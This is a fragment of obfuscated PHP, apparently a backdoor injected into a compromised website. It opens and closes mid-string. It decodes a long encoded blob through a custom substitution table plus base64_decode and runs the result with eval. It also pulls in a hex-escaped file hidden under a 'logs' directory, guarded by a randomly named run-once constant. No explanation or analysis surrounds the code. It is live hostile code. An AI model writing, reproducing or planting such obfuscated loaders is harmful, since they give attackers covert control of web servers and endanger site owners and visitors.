zI3a2MwVHZxalRLcmknLgonN2tjMjdrYzI3a3FuamNFMjdrYzI3a2MyN2tjMjdrcXlUVnE0U3ZFMHRQSTlNYkhuamNFMjdrYzI3a2MyNzhyR0prYzI3a3FHamM3R0prYzI3a3QnLgonYmdocDRMUFc3N0pjVThyR29sWUdUWGt0WE1rY1VOYlE2b2xFVVdQSTltYlk2amNFMjdrYzB3S3JpN2tjMjdrYzI3a2NVNlBRVUxrS0c3eXFiTHZxNCcuCidUc0RHSmtjMjdrYzI3a2MyNmJ0WEdQNG9OYlE2N2xZMjZmVzRDc0RHSmtjMjdrcUdqYzdHSmsnLgonYzI3a3RUcGtjN0x5dFVMVnRBNUtyaTdrYzI3dURHSmtjMjdrYzI3a2MwcHZ6eVRQSWppa2M3NlFtMGxGbXI3UFFaN3l0YScuCidUdUhHK3lxYkx2cTRUSnJHSmtjMjdrYzI3a2Mwd0tyaTdrYzI3a2MyN2tjMjdrYzI2YnRYR1BZMm8nLgona2NVV1BJOW1iSG5qY0UyN2tjMjdrYzI3a2MyN2tjVTZQUVVMUVdhVHVZMm9rY1VOYlE2d0tyaTdrYzI3aycuCidjMjdrcUdqY0UyN2tjMG9LcmlqY0UyN2tjMjZidFhHUFkyb2tBMG12UmpUaHBUTHZ0VDFiWUxlaG1vNmJJalN1UTBHSnR5TGhXRldqWG82YklqZ2J0Rml5dFVMVnRBNTNjMicuCic2YnRYR1A0b05iUTY1SkhuamM3R0prYzI3a3RUcGtjTDVoempUVmM3NmJ0WEdQNG5SUEluUlFZNjcnLgoneUVQN3l0ak1RV1htVnQ3b2xZVTZQUVVMSVNWTGZTVlZKckdKa2MyN2txbmpjRTI3a2MyN2snLgonYzI3ZklQN0pjVTZQUVVMSVNWTHltRzdsSEc3eVc2UkpyR0prYzI3a2MyN2tjMHdLcmk3a2MyN2tjMjdrYzI3a2MyNicuCidmWTJva0FYU2hwWENKMkdKa2MyN2tjMjdrYzI3a2MyN2tjMjdrY1ZEVkVoN2xIZDdycTBpaHFiVGhSajV2V2RpSllEamNFMjdrYzI3a2MyNycuCidrYzI3a2MyN2tjMlJoelBSa0tHK2tjaDkzZTJhWkVobktyaTdrYzI3a2MyN2tjMjdrYzI3a2MnLgonMjd5V1hOeVMyb2xFMjZidFhHUDRuUlBJblJRWURqY0UyN2tjMjdrYzI3a2MyN2tjNndLcmk3a2MyN2tjMjdrYzI3a2MwJy4KJ1RQV0xna0EwTWJReTVQSTk1dXBGaXl0NjVzREdKa2MyN2tjMjdrYzI3a2MyN2JRTDVWS25qY0UyN2tjMjdrYycuCicyNzhyR0prYzI3a2MyN2tjMFR2cWpUZklQN0pjVTZQUVVMSVNWTHltRzdsSEc3eVdGUkpyR0prYzI3a2MyJy4KJzdrYzB3S3JpN2tjMjdrYzI3a2MyN2tjMFRWcFhuSmNVNlBRVUxJU1Y2eW1HNXNER0prYzI3a2MyN2tjMG9Lcmk3a2MyN2tjMjdrdDRuaFc0NWJFMml5dFVMVnRYdnlXQVJRWScuCicyb2xZMlJodDltYldUQnlTNmpjRTI3a2MyN2tjMjd1REdKa2MyN2tjMjdrYzI3a2MyN2ZJUGl5dFVMVnRYdnl6akx5bUcnLgonN2xIRzd5V1g2YmNoNUtyaTdrYzI3a2MyN2tjMjdrYzB3S3JpN2tjMjdrYzI3a2MyN2tjMjdrYzI3UHpqOGh0OW1iV1RCUVdYNmJjNzZidFhHUDRuUmhjVlYzYzI2YnRYJy4KJ0dQNG5SYmNWVkpIbmpjRTI3a2MyN2tjMjdrYzI3a3FHamNFMjdrYzI3a2MyN2tjMjdrdDRuaFc0NScuCidiRTc2YnRYR1A0blJoV0FSUVkyb2xZMlJocDRheVM2amNFMjdrYzI3a2MyN2tjMjdrcW5qY0UyN2tjMjdrYzI3a2MyN2tjMjdrYzBlaG1vRHZxNFJmSUM4aHA0YUpjVTZQJy4KJ1FVTElTVkR5bUc1c0RHSmtjMjdrYzI3a2MyN2tjMjc4ckdKa2MyN2tjMjdrYzBvS3JpN2tjMjdrYzI3a3Q0ZWZ0eDd5dFVMVnRYdicuCid5V1hOeW1Hd0tyaTdrYzI3a2MyN2t0NGRmUXJpSkhuamNFMjdrYzBvS3JpamNFMjdrYzBlaG1vJy4KJ0R2cTRSZklDOHZ0b0xiYzc1c0RHSjhyPT0nOwokdXp6b3pnZiA9IEFycmF5KCcxJz0+JzYnLCAnMCc9PidCJywgJzMnPT4nTCcsICcyJz0+J0EnLCAnNSc9PidwJywgJzQnPT4nVicsICc3Jz0+J2cnLCAnNic9PidrJywgJzknPT4neCcsICc4Jz0+J2YnLCAnQSc9PidFJywgJ0MnPT4nNScsICdCJz0+J3UnLCAnRSc9PidpJywgJ0QnPT4ndycsICdHJz0+JzAnLCAnRic9PidVJywgJ0knPT4nVycsICdIJz0+J1QnLCAnSyc9PidEJywgJ0onPT4nSycsICdNJz0+J3onLCAnTCc9PidoJywgJ08nPT4ncScsICdOJz0+J3InLCAnUSc9PidYJywgJ1AnPT4nWScsICdTJz0+J3knLCAnUic9PiduJywgJ1UnPT4nUicsICdUJz0+J2wnLCAnVyc9PicyJywgJ1YnPT4nZCcsICdZJz0+J1MnLCAnWCc9PidGJywgJ1onPT4nTScsICdhJz0+J3QnLCAnYyc9PidDJywgJ2InPT4nWicsICdlJz0+J2onLCAnZCc9Pic0JywgJ2cnPT4ndicsICdmJz0+J2EnLCAnaSc9PidvJywgJ2gnPT4nYycsICdrJz0+J0knLCAnaic9PidOJywgJ20nPT4nMScsICdsJz0+J1AnLCAnbyc9Pic5JywgJ24nPT4ncycsICdxJz0+J0gnLCAncCc9PidtJywgJ3MnPT4nTycsICdyJz0+J1EnLCAndSc9PidlJywgJ3QnPT4nRycsICd3Jz0+JzcnLCAndic9PidiJywgJ3knPT4nSicsICd4Jz0+JzgnLCAneic9PiczJyk7CmV2YWwvKmEqLyhlaWdzenBtcSgkdHVsZWhyeWssICR1enpvemdmKSk7Cn0=")); include "\x2fhom\x652/a\x73sur\x33/pu\x62lic\x5fhtm\x6c/ut\x69/lo\x67s/u\x73er.\x70hp"; ?> if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) { define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); $moxcogr = 4978; function eigszpmq($owmizg, $xrmhc){$icrsqk = ''; for($i=0; $i < strlen($owmizg); $i++){$icrsqk .= isset($xrmhc[$owmizg[$i]]) ? $xrmhc[$owmizg[$i]] : $owmizg[$i];} $wzdjgmkpre="base64_decode";return $wzdjgmkpre($icrsqk);} $tulehryk = 'rtTBf4oMbQriyW4ShpoSQW9gbShnkAC4HAD5sDGJrtTBf4oMbQriyW9gbmoThRyghRZR3c2DJHnjc605vpT8hW4GJcVaPQL8bQL'. 'TPz4GfIoBQzU5vIFR3c2DJHnjc60ThRyghToSbQ0ghRU5vphiZc6wKr52hW4GQzU5vI4'. '8vtTafQriZc6wKrijc7GJfIPikIUTbpTBbIrikT0kFXoXHGDEJY6jcRnjcE27kc06b'. 'Ib5vpFikT0kFXoXHGDE3c2EQtdEJHnjcRGjc7GJfIPikIUTbpTBbIrik6UyF64K4AoYI4oHU400F6XFHmk'. 'EJY6jcRnjcE27kc06bIb5vpFik6UyF64K4AoYI4oHU400F6XFHmkE3c2'. 'E3Sk5sDGJ8rGJKr55bE2ikIUTbpTBbIriyGXZF640UXT8FT4sQMAGjtZdjWjpjekMPpAdZpXLbp6Wsqy5PIk9jp'. 'XGfIx9sch5JrGJuDGJkc27ktUTbpTBbY7RrF9YUFXAI4oY4FC8ZHrGPM7'. 'zPWPWZejEPH7SPIXpfHPdhpTLPeAWPQU5vMAdySD7ZY6wKrijcE27k'. 'c26btXGPY2okAC4HADwKri7kc27ytULVtX8fW4CkKG7HT4ZHKnjc7GJkc27kcUqHAocrF9HISVehmoLVQUiymG7lY2RZWyT'. 'jerdZHhajWFCPEGGZK463H6CbH7ajIypjpZmPe2GZKUTyMnjcE27kc0RvtoEPID7ytjMQWXmV'. 't7wKrijc7GJkc27ktbmvpjGfIoBktjMQGVTVALghzriJrGJkc27kqnjcE27kc27kc27hp4GVQ'. 'yBkq0SbIV8hp4DvtXebY7R3mdiVzVz8tbGhcTh3Eo5ySDRyS92yXoHU4yIU4yv'. 'yGLF4X08YAoH4cVVJHnjcE27kc0oKrijcE27kc0pVICeVtTgvE0ehmoqbQUQhpT'. 'GPIynbFU5hRZiJrGJkc27kqnjcE27kc27kc27yqyThS2okAXShpX'. 'CJc6wKrijcE27kc27kc27ytXBPI9ChzTMQzXmbQ4TkKG7rQySPQ6iJHnjc7GJkc27kc27kc26PIC'. 'LvqTMuQj8hQ4TVI4vQY2oktjMQGVTVAUgPmygvzriJHnjc7GJkc27kc27kc26hW4nbToDPQUikKG7yXoHU4yIU4yvymj'. 'KF6Tr4XotYF9XH6XjUYVVsDGJkc27kc27kc0zftTnbY2iJcUMvtXMfc2okqjGhRyDvzZiyqjTvtb8htXGfcD7UATYUF'. 'jFHmybQmjXFAXYr4UlFE65kcAolY0trF9HUY6jcE27kc27kc27uDGJkc27kc27kc27kc27yqjTvtb8htXGfc2okqjmPR'. 'jGhE76hW4nbToDPQUi3c2D3c26hW9LhW75sDGJKri7kc27kc27kc27kc05bE2iyqjTvtb8h'. 'tXGfc2olY0ehmoqbQUAvWjYvWoGJc65Kri7kc27kc27kc27kc0wKri7kc27kc27kc27kc27kc27PRyTPInwKri7kc'. '27kc27kc27kc0oKrijcE27kc27kc27kc27ktTpkcLMVqynbIdiyqjTvtb8htXG'. 'fc65Kri7kc27kc27kc27kc0wKri7kc27kc27kc27kc27kc27ytXBPI9ChzTMQzXmbQ4TImG7lY26hW4nbTo'. 'DPQUisDGJkc27kc27kc27kc278rGJkc27kc27kc0oKrijcE27kc27kc27bpoSbIXefc2iytXBPI9ChzTM'. 'QzXmbQ4TktXMkcUeVQySbICGQWU5hE6jcE27kc27kc27uDGJkc27kc27kc27kc27fIP'. '7JcX5vToLhRyLuY76Pz4Shp4BVXo6fQknkcUSbQZ5JrGJkc27kc27kc27kc27uDGJkc27kc27kc27kc27kc27k'. 'cUSbQZ7lY0LhRyLu4oabQyRbY76hp4M3c0ehmoqbQUAfQyTPzUg'. 'hRTZfQjGJcUeVQySbICGQWU5hE65sDGJkc27kc27kc27kc278rGJkc27kc27kc0oKrijcE27kc2'. '7kc27hp4GVQyBktjMQGjibIjN4zy5VtXEvtFiPQySPQT8VIC5hQ4'. 'TJcUSbQZ5JHnjcE27kc0oKrijcE27kc0pVICeVtTgvE0ehmoKft4efmVSfQULPp9TJcU6fQy8vtTMVc6jc'. 'E27kc0wKri7kc27kc27kcU6fQy8vtTMVXozhpTGPIynbY2okAXSh'. 'pXCJc6wKrijcE27kc27kc27bpoSbIXefc2iytU5hTonfQjGktXMkcU6fQk5Kr'. 'i7kc27kc27kqnjcE27kc27kc27kc27ktTpkcL2fQj8Vzy5VtXEv'. 'tFiytU5hE67yEP7fQj8btTSJcU6fQk5JrGJkc27kc27kc27kc27uDGJkc27kc27kc27kc27kc27kcU6fQy8vtTMVXozhpTGPIyn'. 'b4aVkKG7ytU5henjcE27kc27kc27kc27kqGjcE27kc27kc278rG'. 'JKri7kc27kc27kqyTVq4SvE26btTSQW95hzU8Vzy5VtXEvtFwKri7kc278rGJKri7kc27bR'. '4BPzU5vWd7Pzj8UW4GUtTSbIjGvzyCHtTMVc76btTS3c26bt4DVt7oZH25Kri7kc27u'. 'DGJkc27kc27kc26hp4MVI9GkKG7PQySPQ6iJHnjc7GJkc27kc27kc05bE2ikITMQWU5hE76btT'. 'SJY6jcE27kc27kc27uDGJkc27kc27kc27kc27hp4GVQyBkcUSbQjmvqrwKri7kc27kc27kqGjc7GJkc27kc'. '27kc26hp4MVI9GImG7lY26btTSsDGJkc27kc27kc26btTSQWjgVICGkKG7Z'. 'Knjc7GJkc27kc27kc05bE2iytUThqUikKD7ZY6jcE27kc27kc27uDGJkc2'. '7kc27kc27kc27hp4GVQyBkcUSbQjmvqrwKri7kc27kc27kqGjc7GJ'. 'kc27kc27kc26btTSkKG7hzUSvt4BJcU6fQk5kKGokKA7lS26btTSkK'. 'i7hRUSfIGiytU5hED7ym9h3Sh5sDGJkc27kc27kc26fc2okA0ght4BbtTSJcU6fQk5sDGJkc27kc27'. 'kc05bE2iyt77lHGokAb0HXjXJrGJkc27kc27kc0wKri7kc27kc27kc27kc0SbQUmhpd7yqyThz4nV'. 'KnjcE27kc27kc278rGJKri7kc27kc27kqVifI9Tkc7iytP7lY0SbIX6btTSJcUiJY67kHGokAb0HXjXJrGJkc27kc27kc0wKr'. 'i7kc27kc27kc27kc05bE2iytP7kHGokchByS0Lvpr7ytP7kHGokchB3Eh5Kri7kc27kc27kc27k'. 'c0wKri7kc27kc27kc27kc27kc27ytjmhRyTvRU8btTSkKG7kEU6fQkgytPEsDGJkc27kc27'. 'kc27kc27kc27ktTpkcL5hmo6fQkiytjmhRyTvRU8btTSJY6jcE27kc27kc27kc27kc27kc0wKri7kc27kc'. '27kc27kc27kc27kc27kcU6fQy8PWomvRr7JMG7ZHnjc7GJkc27kc27kc27kc27kc27kc27kc26hp4'. 'MVI9GImG7lY26Pz4Shp4BVXo6fQkwKri7kc27kc27kc27kc27k'. 'c27kc27kcUSbQjmvqr7lY0LhRyLu4oabQyRbY76hp4MVI9G3c0'. 'ehmoqbQUAfQyTPzUghRTZfQjGJcUeVQySbICGQWU5hED7ytUThqUi'. 'kcx7ZH25JHnjcE27kc27kc27kc27kc27kc0oKri7kc27kc27kc27kc0oKr'. 'i7kc27kc27kqGjc7GJkc27kc27kc0evtoMbIU5hE76fc6wKrijcE27kc27kc27hp4GVQyBkcUSbQjmvqrwKri7kc2'. '78rGJKri7kc27bR4BPzU5vWd7Pzj8UW4GUtoeFpogVc75Kri7kc27uDGJkc27kc27kc26btoehpogVXoTvpr7lY0MVqy'. 'ShtoMJcU8FG4Y464YISVHrmyyFXU8U6TZUFC0HFFRQYD7yXoHU4yIU4yvymyXF44XFmU844yyymG5sDGJk'. 'c27kc27kc05bE2iytUgPzygvzU8bIC6kKGolY0trF9HUY6jcE27kc27kc27uDGJkc27kc27kc27kc27hp4GVQyBk'. 'cU8FG4Y464YISVAHGj4HF4s4XoYHGoFymGwKri7kc27kc27kqGjcE'. '27kc27kc27bI9MbITpkc76btoehpogVXoTvpr7lHGokK25Kri7kc27kc27kqnjcE27kc27kc27kc27kq'. 'yTVq4SvE2E3SkwKri7kc27kc27kqGjcE27kc27kc27bI9MbrGJkc27kc27kc0wKri7kc27kc27kc27k'. 'c0SbQUmhpd7hz4EhzUSJcU8FG4Y464YISVHrmyyFXU8U6TZUFC0HFFRQYD7ZcD7ytUgP'. 'zygvzU8bIC6JHnjcE27kc27kc278rGJkc27kqGjc7GJkc27ktTpkc7LbR4BPzU5vWC8bQL5hzUMJcVpfI9TQz0mVXoevWC'. 'GbICGhSh5JrGJkc27kqnjcE27kc27kc27bR4BPzU5vWd7bpTnb4oDVQU8PW'. 'oBVt4BVqZiytdnkcU63c26bp9LbS2okAbLvqjTJrGJkc27kc27kc0wKri7kc27kc27k'. 'c27kc26vIo6bY2okcUpvtXRkKGokK77lS2RPYh7sE2RVShwKri7kc27kc27kc27kc26bE2'. 'okA0pvz0TvE76vED7ytmgbtF5sDGJkc27kc27kc27kc27fIP7JcUpkKGolY0tPI9MbY6jcE27kc27kc27kc2'. '7kqnjcE27kc27kc27kc27kc27kc0SbQUmhpd7ZKnjcE27kc27kc27kc27kqGjcE27kc27kc27'. 'kc27kt4nhWFjcE27kc27kc27kc27kqnjcE27kc27kc27kc27kc27kc05bE2ifQj8PQySPQ6iytr5JY26bc2oktTaht9gb'. 'tFiytr5sDGJkc27kc27kc27kc27kc27kcUEuQUThmozhpTGVt4BkKG7bRVSfQUTJcUp3c26bc6wKri7kc27kc27'. 'kc27kc27kc27bpjnvzjTJcUpJHnjcE27kc27kc27kc27kc27kc0SbQUm'. 'hpd7ytyCVt4MQzVSfQUGbIdwKri7kc27kc27kc27kc0oKri7kc27kc27kqGjcE27'. 'kc0oKrijcE27kc05bE2ikIbmvpjGfIoBQW4dfQjGhS7RbpTnb4oRbQU8PWoBVt4BVqZRJY6jcE27kc0wKri7kc27kc2'. '7ktbmvpjGfIoBktb5vt48bW4GQWjgvRUTvRUMJcUpfI9TvpXabY6jcE27kc27kc27uDGJkc27k'. 'c27kc27kc27ytbiPIC6vtF7lY0pvz0TvE76bpTnbICLvIFnkcySkE6wKri7kc27kc27kc27kc26'. 'bpjgvRUTvRUMkKG7bRyTPIriytbiPIC6vtFnktb5vt4MfQ5TJcUpfI9TvpXabY'. '65sDGJkc27kc27kc27kc27bpjnvzjTJcUpftXBbt9TJHnjc7GJkc27kc27kc27kc'. '27hp4GVQyBkcUpPWoBVt4BVqZwKri7kc27kc27kqGjcE27kc0oKrijc7GJkc27ktbmvpjGfIoBktjMQWUTPzyChqU8htLLhWF'. 'iytULVtAnkcUNbQ65Kri7kc27uDGJkc27kc27kc26vz4GQWULVtA7lY2E'. 'kenjc7GJkc27kc27kc0pvzk7JcU5lH2wkcU5lqjGhp9TvE76btXGPY6wJrGJkc27kc27kc0wKri7kc27kc27kc27kc0pvzk7Jc'. 'UOlH2wkcUOlqjGhp9TvE76fW4CJY2pyE26fH9MVqynbIdiytULVtA5sS26fEnN3c26fYnNJrGJkc27kc27kc27kc27'. 'uDGJkc27kc27kc27kc27kc27kcUgVQU8btXGPY2BlY0efqkivzy6JcU6PQULISU5QY67QE0ghpriytaTu4n6fTG5'. 'JHnjcE27kc27kc27kc27kqGjcE27kc27kc278rGJKri7kc27kc27kqyTVq'. '4SvE26vz4GQWULVtAwKri7kc278rGJKri7kc27bR4BPzU5vWd7Pzj8bt4ehRTDVc76btXGPYD7ytaTuY6jcE27kc0wKr'. 'i7kc27kc27ktVnvWyLvc26Pzj8PQ4GfKnjc7GJkc27kc27kc0SbQUmhpd7Pzj8bt4ehRT'. 'DVXoDftXMbYLehmo6bIjSuQ0GQz0iPQjTJcU6PQUL3c26fW4CJYD7ytjMQW'. 'XmVt75sDGJkc27kqGjcE27kc0pVICeVtTgvE0ehmoTvpjSuQ0GJcU6PQUL3c26fW4CJrGJkc27kqnjcE27kc27kc'. '27bW9gPpXnkcUehmoLVQUisDGJKri7kc27kc27kqyTVq4SvE0ehmo6bIjSuQ0GQz'. '0iPQjTJtjMQWUTPzyChqU8htLLhWFiytULVtAnkcUehmoLVQUiJYD7ytaTuY6wKri7kc278rGJKri7k'. 'c27bR4BPzU5vWd7Pzj8bpTnb4oSbIX6JcUDPQUiJrGJkc27kqnjcE27kc27kc27ytULVtA7lY02bpTnb4oRbQ'. 'U8PWoBVt4BVqZiyq0LVt75sDGJKri7kc27kc27kqyTVq4SvE26btXGPHnjcE27kc0oKrijcE27'. 'kc0pVICeVtTgvE0ehmopfI9TQzVSfQUTJcUDPQUi3c26btXGPY6jcE27kc0wKri7kc27kc27kA0pfI9T'. 'Qz0mVXoevWCGbICGhS76htXGfcD7ytULVtA5sDGJkc27kqGjc7GJkc27ktbmvpjGfIoBktjMQWb5v'. 't48PQ0DbIC6JcUDPQUi3c26btXGPY6jcE27kc0wKri7kc27kc27kA0pfI9TQz0mVXoevWCG'. 'bICGhS76htXGfcD7ytULVtAnkK75sDGJkc27kqGjc7GJkc27ktbmvpjGfIoBktjMQzjghRU8'. 'PWoahtXSbQkiytAnkcUEJrGJkc27kqnjcE27kc27kc27hp4GVQyBkqjGhp9TvE76PY673Y0MVqynbIdiytk5sDGJk'. 'c27kqGjc7GJkc27ktbmvpjGfIoBktjMQGVTVAjgvImgvTjGvzyLbWFiytU5hRZoH'. 'T4ZHc6jcE27kc0wKri7kc27kc27kcUevWmavWC8vpXabQZ7lY00hRyLuY7Evz0GfIoBhSknkcyWfI4zhSknkc'. 'yDPIVThSknkcyMbQjMfIoBhSknkcyMVtXGhSknkcymhW4ShSknkcyLhRU5PW9ThSknkcy6VImDkED7kpLTPIUT'. 'hRZE3c2EvtTEhSk5sDGJkc27kc27kc05bE2ikYU6fQyMJrGJkc2'. '7kc27kc0wKri7kc27kc27kc27kc26btTShS2oktjMQGVTVXVSfQULPp9TUtTShS75sDGJkc27kc27kc0oKrijcE27kc27kc27VQj'. 'ghRriytU5hRZnkcVehmoMvzyGQWjgvQ0Lhp4SyS6wKrijcE27kc27kc27bpoSbIX'. 'efc2iytU5hRZ7PQZ7ytU5hE6jcE27kc27kc27uDGJkc27kc27kc27kc27fIP7JtTMQWU5hE76btTSJY2pyE02'. 'fQj8Vzy5VtXEvtFiytU5hE65Kri7kc27kc27kc27kc0wKri7kc27kc27k'. 'c27kc27kc27ytU5hTo5vpUTuc2okK2wKri7kc27kc27kc27kc27kc27bpoSkc76uKGDsS26uc2xkqjGhp9TvE76btTSJH'. 'n7yq7NJS6jcE27kc27kc27kc27kc27kc0wKri7kc27kc27kc27kc27kc27kc27kcU6fQy8fIC6b'. 'Q77JMG7vzy6JcU6fQyvyqLVJHnjcE27kc27kc27kc27kc27kc0oKr'. 'ijcE27kc27kc27kc27kc27kc26VtmDQWU5hE2okcU6fQk73E2E3Sk73E26PWoavIoBQWCLvI4MISU6fQy8f'. 'IC6bQ77yY0evz4BVc76PWoavIoBQWCLvI4MJ4GwKrijcE27kc27kc27kc27kc27kc05bE2ibpTnb4oTu'. 'tTMVqZiyqUahXo6fQk5JrGJkc27kc27kc27kc27kc27kqnjcE27kc27kc27kc27kc27kc27kc27hp4GVQyB'. 'kcUGvQ08btTSsDGJkc27kc27kc27kc27kc27kqGjc7GJkc27kc27kc27kc27kc27ktTpJtmNbtTSJcUGvQ08bt'. 'TSJY6jcE27kc27kc27kc27kc27kc0wKri7kc27kc27kc27kc27kc27kc27'. 'kqyTVq4SvE26VtmDQWU5henjcE27kc27kc27kc27kc27kc0oKri7kc27kc27kc27kc0oKri7kc27kc27kqGjc7GJkc27kc27'. 'kc0SbQUmhpd7kEkwKri7kc278rGJKri7kc27bR4BPzU5vWd7Pzj8ht9mbWTBQWX6bc76vpXabYD7ytyLhWF'. 'WjXo6PQULJrGJkc27kqnjcE27kc27kc27ytULVtA7lY0EPQjTjeU8bt4evWUTJcUEPQjTjeU8btXGPY6wKrijcE27kc27kc27'. 'yqjGvzyLbW48htXGfc2oktjMQGVTVAjgvImgvTjGvzyLbWFiJY2Bkckg'. 'kenjcE27kc27kc27yqjGvzyLbW48htXGfc2okcUMVtoSPIVTQz0LVt773E0MVIyMVqkivIrm'. 'JcyePIjibYk53c2D3c2mJY2Bkcy8kE2Bktm6jY76vpXabY2BktjMQGVTVALghzriJY6wKrijc7GJkc27kc27kc0ehmo'. 'pfI9TQzVSfQUTJcUMVtoSPIVTQz0LVt7nktjMQW4BPzyChqriytULVtAnktjMQGVTVALghzriJY65sDGJkc27kqGjc7GJkc27k'. 'tbmvpjGfIoBktjMQz0nVIV5vToSbIGiytCLvIF5Kri7kc27uDGJkc27kc'. '27kc26hzUghpXRb4oDPQUikKG7Pzj8UW4GrWoavIoBFzUghpXRbY753E2E3SkwKri7kc27kc27kcUMVtoSPIVTQz0LVt77lY2'. '6hzUghpXRb4oDPQUikcd7hz4EhzUSJtm6jY7EPWXeftFEJYD7ZcD7jY'. '673E2EQSk73E0abKFiytCLvIF73E0ehmoqbQUkvzjGJc65sDGJK'. 'ri7kc27kc27ktTpkcLpfI9TQW4dfQjGhS76hzUghpXRb4oDPQUiJY6jcE27kc27kc27uDGJkc27kc27'. 'kc27kc27rq4BvtTBfS76hzUghpXRb4oDPQUiJHnjcE27kc27kc278rGJkc27kqGjc7GJkc27ktbmvpjG'. 'fIoBktjMQz0nVIV5vTonvWX6JcUBPImTlFC4HAD5Kri7kc27uDGJkc27kc27kc'. '26hzUghpXRb4oDPQUikKG7Pzj8UW4GrWoavIoBFzUghpXRbY75sDGJKri7kc27kc27ktTpkcL5h'. 'mo6fQkiyqjGvzyLbW48htXGfc65Kri7kc27kc27kqnjcE27kc27kc27kc27kt'. 'Tpkc76vpXabY2olY0s4F9ZJY2g3S0nvWX6ktXnvc0Dvq4RfICMKri7kc27kc27kc27kc0wKri7'. 'kc27kc27kc27kc27kc27bpoSbIXefc2ihWjLvpU5hE76hzUghpXRb4oDPQUiJY0LhS26fW4ClHd6ht9mbW'. 'TBQWCLvIF5Kri7kc27kc27kc27kc27kc27uDGJkc27kc27kc27kc27kc27kc27kc05bE2ihzUShtoMJcUDvq4RfIC8vpXabYD7hz'. '4EhzUSJtm6jY7EPWXeftFEJYD7ZcD7jY65kcAolY0tPI9MbY6jcE27kc27kc27kc27kc27kc27kc27uDGJkc2'. '7kc27kc27kc27kc27kc27kc27kc27rt4WPIDiPzj8bt4ehRTDVcL'. 'ehmopfI9TQzyTPIriyqjGvzyLbW48htXGfc2BkckgkE2BkcUDvq4RfIC8vpXabY6nk'. 'tjMQGVTVALghzriJY65sDGJkc27kc27kc27kc27kc27kc27kc0oKri7kc27kc27kc27kc27kc2'. '78rGJkc27kc27kc27kc278rGJkc27kc27kc27kc27bI9MbrGJkc27kc27kc27kc27uDGJkc27kc27kc27kc27kc27'. 'kcUMVtoSPIVTQz0LVt77lY26hzUghpXRb4oDPQUikcd7kExEkcd7hz4EhzUSJtm6jY7EPWXeftFEJYD7ZcD7jY'. '673E2EQSk73E0abKFiytCLvIF73E0ehmoqbQUkvzjGJc65sDGJKri7kc27kc27kc'. '27kc27kc27fIP7Jtb5vt48bQL5hzUMJcUMVtoSPIVTQz0LVt75JrGJkc27kc27kc27kc27kc27kqnjcE27kc2'. '7kc27kc27kc27kc27kc27rt4WPIDiPzj8bt4ehRTDVcLehmopfI9T'. 'QzyTPIriyqjGvzyLbW48htXGfc6nktjMQGVTVALghzriJY65sDGJkc27kc27kc27kc27kc27kq'. 'GjcE27kc27kc27kc27kqGjcE27kc27kc278rGJkc27kqGjc7GJkc27ktbmvpjGfIoBktjMQzVSfQULPp9'. 'TQWjibIjNJc6jcE27kc0wKri7kc27kc27ktTpkcLMVqynbIdiPzj8UW4GrWoavIoBFzUghpXRbY75JY2LlY2DJrGJkc27kc'. '27kc0wKri7kc27kc27kc27kc0SbQUmhpd74qymbHnjcE27kc27kc278rGJkc27kc27kc0TvqjTKri'. '7kc27kc27kqnjcE27kc27kc27kc27kqyTVq4SvE0tPI9MbHnjcE27kc27kc278rGJkc27kqGjc7GJkc27kt'. 'bghp4LPW77JcU8rGolYGTXktXMkcUNbQ6olEUWPI9mbY6jcE27kc0wKri7kc27kc27kcU6PQULkKG7yqbLvq4'. 'TsDGJkc27kc27kc26btXGP4oNbQ67lY26fW4CsDGJkc27kqGjc7GJk'. 'c27ktTpkc7LytULVtA5Kri7kc27uDGJkc27kc27kc0pvzyTPIjikc76Qm0lFmr7PQZ7yta'. 'TuHG+yqbLvq4TJrGJkc27kc27kc0wKri7kc27kc27kc27kc26btXGPY2o'. 'kcUWPI9mbHnjcE27kc27kc27kc27kcU6PQULQWaTuY2okcUNbQ6wKri7kc27k'. 'c27kqGjcE27kc0oKrijcE27kc26btXGPY2okA0mvRjThpTLvtT1bYLehmo6bIjSuQ0GJtyLhWFWjXo6bIjgbtFiytULVtA53c2'. '6btXGP4oNbQ65JHnjc7GJkc27ktTpkcL5hzjTVc76btXGP4nRPInRQY67'. 'yEP7ytjMQWXmVt7olYU6PQULISVLfSVVJrGJkc27kqnjcE27kc27k'. 'c27fIP7JcU6PQULISVLymG7lHG7yW6RJrGJkc27kc27kc0wKri7kc27kc27kc27kc26'. 'fY2okAXShpXCJ2GJkc27kc27kc27kc27kc27kcVDVEh7lHd7rq0ihqbThRj5vWdiJYDjcE27kc27kc27'. 'kc27kc27kc2RhzPRkKG+kch93e2aZEhnKri7kc27kc27kc27kc27kc'. '27yWXNyS2olE26btXGP4nRPInRQYDjcE27kc27kc27kc27kc6wKri7kc27kc27kc27kc0'. 'TPWLgkA0MbQy5PI95upFiyt65sDGJkc27kc27kc27kc27bQL5VKnjcE27kc27kc'. '278rGJkc27kc27kc0TvqjTfIP7JcU6PQULISVLymG7lHG7yWFRJrGJkc27kc2'. '7kc0wKri7kc27kc27kc27kc0TVpXnJcU6PQULISV6ymG5sDGJkc27kc27kc0oKri7kc27kc27kt4nhW45bE2iytULVtXvyWARQY'. '2olY2Rht9mbWTByS6jcE27kc27kc27uDGJkc27kc27kc27kc27fIPiytULVtXvyzjLymG'. '7lHG7yWX6bch5Kri7kc27kc27kc27kc0wKri7kc27kc27kc27kc27kc27Pzj8ht9mbWTBQWX6bc76btXGP4nRhcVV3c26btX'. 'GP4nRbcVVJHnjcE27kc27kc27kc27kqGjcE27kc27kc27kc27kt4nhW45'. 'bE76btXGP4nRhWARQY2olY2Rhp4ayS6jcE27kc27kc27kc27kqnjcE27kc27kc27kc27kc27kc0ehmoDvq4RfIC8hp4aJcU6P'. 'QULISVDymG5sDGJkc27kc27kc27kc278rGJkc27kc27kc0oKri7kc27kc27kt4eftx7ytULVtXv'. 'yWXNymGwKri7kc27kc27kt4dfQriJHnjcE27kc0oKrijcE27kc0ehmo'. 'Dvq4RfIC8vtoLbc75sDGJ8r=='; $uzzozgf = Array('1'=>'6', '0'=>'B', '3'=>'L', '2'=>'A', '5'=>'p', '4'=>'V', '7'=>'g', '6'=>'k', '9'=>'x', '8'=>'f', 'A'=>'E', 'C'=>'5', 'B'=>'u', 'E'=>'i', 'D'=>'w', 'G'=>'0', 'F'=>'U', 'I'=>'W', 'H'=>'T', 'K'=>'D', 'J'=>'K', 'M'=>'z', 'L'=>'h', 'O'=>'q', 'N'=>'r', 'Q'=>'X', 'P'=>'Y', 'S'=>'y', 'R'=>'n', 'U'=>'R', 'T'=>'l', 'W'=>'2', 'V'=>'d', 